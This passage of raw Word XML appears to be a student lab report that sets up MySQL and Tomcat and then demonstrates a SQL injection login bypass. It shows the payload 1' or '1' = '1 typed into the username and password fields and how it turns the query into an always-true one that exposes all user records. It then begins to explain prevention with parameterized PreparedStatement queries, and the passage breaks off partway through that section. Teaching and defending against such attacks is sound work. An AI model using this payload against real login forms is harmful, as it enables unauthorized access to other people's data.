          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Update Repository Index-</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="313131"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> To install the latest available version of a software from the Internet repositories, the local repository index needs to be updated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="240" w:before="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="313131"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="ead1dc" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="313131"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="ead1dc" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt-get update</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="240" w:before="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="313131"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="ead1dc" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="313131"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    ii.</w:t>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="313131"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Install MYSQL server</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="313131"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="313131"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="ead1dc" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt-get install mysql-server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="240" w:before="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="313131"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="313131"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4376738" cy="2414752"/>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76738" cy="241475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numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="313131"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MYSQL Server Configuration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="313131"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="ead1dc" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo mysql_secure_installation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="240" w:before="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="313131"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="313131"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4475052" cy="20526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75052"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after="240" w:before="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="313131"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="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 JDBC Connector - </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:jc w:val="both"/>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download latest JDBC connector from the website </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://dev.mysql.com/downloads/connector/j/</w:t>
        </w:r>
      </w:hyperlink>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based on appropriate Operating System</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>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the jar file in the lib folder of Apache Tomcat server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:widowControl w:val="0"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="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Apache Tomcat Server and its configurations - </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:before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Apache Tomcat Server Installation - </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>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tomcat.apache.org website and download the latest version of Apache Tomcat Server based on the Operating System.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>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folder in /home directory and extract the downloaded folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:before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Configuration - </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>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2 paths CATELINA_HOME and JAVA_HOME in bashrc file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:widowControl w:val="0"/>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CATELINA_HOME is set to the file address of the tomcat package.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
      <w:pPr>
        <w:widowControl w:val="0"/>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JAVA_HOME is set to the file address of the java jdk package.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="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bin folder of tomcat and start startup.sh shell script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:widowControl w:val="0"/>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Tomcat has started. Go to its webpage using “firefox localhost:8080” command and go to Manager App. Copy the Username and Password and paste it in tomcat_users.xml file in the tomcat package which is extracted in /home directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>
        <w:widowControl w:val="0"/>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username and password in tomcat_users.xml and save it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>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 the Tomcat by running  shutdown.sh script and start it again using startup.sh script inorder to get the necessary changes for configuration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="240" w:before="240"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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Sublime Text Editor to run HTML and JSP Scripts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widowControl w:val="0"/>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Sublime Text Editor from Ubuntu Software Center.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:widowControl w:val="0"/>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after="240" w:before="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>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d.  Demonstration of SQL Injection Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">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Username: 1’ or ‘1’ = ‘1     Password: 1’ or ‘1’ = ‘1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">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sql query, it will converted as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="240" w:before="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>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shd w:fill="ead1dc" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">select * from user_details where userid = “1’ or ‘1’ = ‘1”  and password = “1’ or ‘1’ = ‘1” ;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="240" w:before="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="45c010"/>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select * from user_details where </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">userid = “1’</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or ‘1’ = ‘1”  and</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b w:val="1"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">password = “1’</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or ‘1’ =‘1”;</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="45c010"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                                                                                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">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select * from user_details where </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>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color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">‘1’ = ‘1”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or</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="990000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">‘1’ = ‘1”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="99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select * from user_details where </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>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color w:val="45c010"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">True</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="45c01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color w:val="ff0000"/>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color w:val="45c010"/>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select * from user_details where  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="45c010"/>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color w:val="45c010"/>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7">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select * from user_details where </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="45c010"/>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8">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2952750"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2" name="image6.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image6.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:srcRect b="0" l="4807" r="641" t="11680"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5619750" cy="29527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c78d8"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The website will display all the user details from the database.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7850" cy="2952750"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5" name="image8.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image8.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:srcRect b="0" l="4807" r="0" t="11680"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="56578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spacing w:after="240" w:before="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>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b5394"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">e. Demonstration of Preventing SQL Injection Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">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SQL Injection Attack is prevented by using Java's PreparedStatement class, bind variables (i.e. the question marks) and the corresponding setString methods,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">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Username: 1’ or ‘1’ = ‘1     Password: 1’ or ‘1’ = ‘1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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sql query, it will converted as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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user_details where userid = “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1’ or ‘1’ = ‘1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">”  and password = “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1’ or ‘1’ =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It parameterizes the query as follows: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">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pstmt.setString(1,userid);   ------   userid :  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1’ or ‘1’ = ‘1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">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pstmt.setString(2,password); ------  password: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1’ or ‘1’ = ‘1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
